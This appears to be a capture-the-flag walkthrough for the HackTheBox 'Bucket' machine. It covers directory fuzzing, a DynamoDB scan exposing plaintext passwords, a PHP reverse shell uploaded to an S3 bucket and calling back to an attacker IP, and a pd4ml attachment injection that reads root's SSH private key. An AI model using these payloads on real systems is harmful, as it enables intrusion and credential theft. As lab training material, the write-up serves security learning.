HTB Bucket

Writeup for Bucket box on HackTheBox.eu

Initial enumeration

Port 80 is open so we navigate to that in a browser. Here we discovere it's trying to load images from s3.bucket.htb so we add the s3.bucket.htb and bucket.htb to our hosts file

Using fuff doesn't show anything interesting except a shell folder

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://s3.bucket.htb/FUZZ -o ffuf_10.10.10.212.json -e .html,.php,.txt -c --fl 10
http://s3.bucket.htb/shell/

AWS DynamoDB

var params = {
    ExclusiveStartTableName: 'table_name', // optional (for pagination, returned as LastEvaluatedTableName)
    Limit: 10, // optional (to further limit the number of table names returned per page)
};
dynamodb.listTables(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

This show one table users

var params = {
    TableName: 'users',
   
};
dynamodb.scan(params, function(err, data) {
    if (err) ppJson(err); // an error occurred
    else ppJson(data); // successful response
});

This shows us the following data:

{
    "Items": [{
        "password": {
            "S": "[email protected]#[email protected]#"
        },
        "username": {
            "S": "Mgmt"
        }
    }, {
        "password": {
            "S": "Welcome123!"
        },
        "username": {
            "S": "Cloudadm"
        }
    }, {
        "password": {
            "S": "n2vM-<_K_Q:.Aa2"
        },
        "username": {
            "S": "Sysadm"
        }
    }],
    "Count": 3,
    "ScannedCount": 3
}

We test the credentials above with both SSH and AWS s3. We get a hit on the AWS S3 so let's run some enumeration on this

AWS S3 Enumeration

List content of S3 bucket

aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/

Write the following content to sh.php

<?php
$sock=fsockopen("10.10.x.x",8443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

Upload the file to the s3 bucket

aws --endpoint-url http://s3.bucket.htb/ s3 cp sh.php s3://adserver/sh.php

Setup Listener

ncat -nvlp 8443

Trigger the shell - you might have to try multiple times

curl http://bucket.htb/sh.php

This will give us a shell as the www-data user.

From etc/passwd we see there is another user roy and root which have access to the server.

There seems to be a server listening on loopback port 8000, this looks interesting.

Using Ligolo we create a tunnel for us to view port 8000

Kali Box:

Kali Ligolo

Bucket Box:

Box Ligolo

Using the password n2vM-<_K_Q:.Aa2 we try to ssh into the server as roy.

This works and we have our first flag.

Privilege escalation

Now we have read access to /var/www/bucket-app

In here we find a pd4ml_demo.jar but also looking at index.php we notice it does something strange PHP Data

By the looks of the script if we can write to the alerts table an entry with the title Ransomware and data as html it will generate a pdf out of it.

Proxy the traffic to port 4566 again using ligolo so we can easily add the necessary data to DynamoDB

Create the alerts table:

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

Test the table

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts             
{
    "Items": [],
    "Count": 0,
    "ScannedCount": 0,
    "ConsumedCapacity": null
}

Doing some research into pd4ml it looks like it has a custom html attribute for attachments. Let's give it a go

<pd4ml:attachment src="file:///etc/passwd"><pd4ml:attachment>

After a few failed attempts of generating invalid PDFs I ended up with the follwing bash script (scripted because the server cleans itself often and the files/tables dissapear)

#!/bin/bash

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1  put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<html><pd4ml:attachment description=\"attached.txt\" type=\"paperclip\" src=\"file:///root/.ssh/id_rsa\"></pd4ml:attachment></html>"}}'

aws dynamodb --endpoint-url http://127.0.0.1:4566 --region us-east-1 scan --table-name alerts

curl -X POST -d "action=get_alerts" http://127.0.0.1:8000

The above script will create a new DynamoDB table, insert our payload to grab the root id_rsa and force the script to generate the pdf. Once the exploit runs access the pdf via http://127.0.0.1:8000/files/result.pdf and download the attached file, change the permissions to be 600 and ssh in as root.